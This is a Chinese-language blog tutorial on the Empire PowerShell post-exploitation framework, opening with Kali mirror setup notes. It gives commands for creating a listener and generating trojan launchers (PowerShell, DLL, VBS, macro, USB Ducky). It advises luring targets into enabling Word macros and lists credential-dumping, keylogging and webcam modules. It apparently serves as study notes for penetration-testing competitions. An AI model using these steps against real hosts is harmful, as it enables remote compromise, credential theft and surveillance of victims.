Patrilic's blog

Empire

Word count: 1,659 / Reading time: 7 min
2018/05/06 Share

0x00 前言

前段时间一直着重于Metasploit的学习,最近小组里打了两场线下赛,再加上平时对一些站点的渗透和线上平台的练习,准备对kali中的一些工具进行总结,以备复习,metasploit的总结就先放一段落

切换kali源

这里做一个笔记:kali的官方源就是属于那种又臭又长的,还卡,一般会替换为中科大或者阿里的镜像kali源
方法如下:

vi /etc/apt/sources.list
然后把文本中的内容替换为如下内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云
#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙大
#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

#官方源
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib

#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib

保存之后执行下列命令

apt-get update && apt-get upgrade && apt-get dist-upgrade
apt-get clean
reboot

关于签名失效。使用

apt-key adv –keyserver hkp://keys.gnupg.net –recv-keys 7D8D0BF6

即可

备注一些命令
apt-get常用命令:

  • update – 取回更新的软件包列表信息
  • upgrade – 进行一次升级
  • install – 安装新的软件包(注:软件包名称是 libc6 而非 libc6.deb)
  • remove – 卸载软件包
  • purge – 卸载并清除软件包的配置
  • autoremove – 卸载所有自动安装且不再使用的软件包
  • dist-upgrade – 发布版升级,见 apt-get(8)
  • dselect-upgrade – 根据 dselect 的选择来进行升级
  • build-dep – 为源码包配置所需的编译依赖关系
  • clean – 删除所有已下载的包文件
  • autoclean – 删除已下载的旧包文件
  • check – 核对以确认系统的依赖关系的完整性
  • source – 下载源码包文件
  • download – 下载指定的二进制包到当前目录
  • changelog – 下载指定软件包,并显示其changelog

#0x01 Empire

简介

Empire是一个针对windows平台的使用PowerShell脚本作为攻击载荷的渗透攻击框架,包括了从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等等,并且能够适应通信躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似于Metasploit,是一个基于PowerShell的远程控制木马。——来自Empire官方

Empire的全部功能可以参考官网: http://www.powershellempire.com/
Github:https://github.com/EmpireProject/Empire

安装

Empire的安装及其简单,选取一个目录输入如下命令

git clone https://github.com/EmpireProject/Empire.git
clone完成后
cd Emipre
sudo /setup/install.sh
若无报错,等待安装完成即可

安装结束后,在/Empire目录运行如下命令即可启动

./empire
可以看到如下界面
Cg5N4A.jpg

基本使用

从图中可以看到笔者此时最新的Empire版本是包含了284个模块,那我们该如何设置一个监听呢
运行help参数来查看使用帮助
Cg5tNd.jpg
如图,看起来只有这几个命令可以使用
Empire的使用原理其实和前面介绍过的Metasploit很相似,都是通过构造一个监听,然后生成木马,在目标主机运行木马然后反弹回本机

生成监听

所以第一步我们构造一个监听,输入listeners,然后help寻求帮助
输入uselistener 双击tab可以看到,有7种类型的listener可供我们选择
第一次玩我们选择http监听

uselistener http
set Name patrilic-http
set Host 192.168.0.102
execute
info

可以看到生成的listener信息
输入

listeners
list

可以看到当前激活的监听
这里注意一点,不同的listener必须使用不同的端口和不同的Name,不然会报错

生成木马

如果只需要生成简单的powershell木马,只需要运行launcher即可
launcher

launcher powershell patrilic-http

Cg5YAH.jpg
将生成的这段命令在装有powershell的目标机上执行,就会得到这个主机的权限,比如我们现在在宿主机上执行一下这段命令,宿主机上安装有杀软.
Cg5d3t.jpg
我们可以看到,已经得到了宿主机的shell了。
下面介绍一些常用的生成木马的方式
1.dll
使用

usestager windows/dll
Cg5wgP.jpg
然后添加到listener即可
Cg50jf.jpg
在/tmp目录下生成了一个了dll文件,在目标主机上执行即可

2.launcher_vbs
使用

userstager windows/launcher_vbs
相似的过程

Cg5rDS.jpg
Cg5sHg.jpg

同样的在目标机上执行vbs脚本即可

3.launcher_bat
同上

4.marco
用来生成宏代码,我们可以植入到word文档之类的地方,只需要诱导别人主动打开宏即可

usestager windows/marco
set Listener Patrilic
execute

可以看到生成的代码在/tmp/marco中
Cg56EQ.jpg
将代码复制进入一个word文档的宏中,保存即可
这里要提到一个东西,必须将文件另存为Word 97-2003文档才能生效

5.Ducky
Empire也支持Ducky,使用windows/ducky模块即可,只需要设置Listener,生成代码烧入USB中即可。

连接和使用

和Metasploit一样,在反弹回shell后,Empire一样有很多的方式进行渗透。
这里只介绍一些基本的方法
首先我们连接代理

使用interact 的方式
Cg5cNj.jpg

连接之后输入help查看我们能使用的命令

Cg5g4s.jpg

输入usemodule双击tab,我们就能够看到能够使用的模块

可以看到一共204个模块,我自己常用的模块有以下几个:

  • WebcamRecorder –摄像头
  • mimikatz –内置的获取密码模块,在msf中也有
  • screenshot –屏幕截图
  • keylogger –键盘记录
  • clipboard_monitor –剪切板记录
  • share_finder –查看域共享
  • arpscan –arp扫描

这些模块都十分好上手,就不逐一讲解了。

关于Empire的提权模块,打算等学习了一波提权后再一起写写总结吧。

CATALOG
  1. 1. 0x00 前言
    1. 1.1. 切换kali源
    2. 1.2. 简介
    3. 1.3. 安装
    4. 1.4. 基本使用
      1. 1.4.1. 生成监听
      2. 1.4.2. 生成木马
      3. 1.4.3. 连接和使用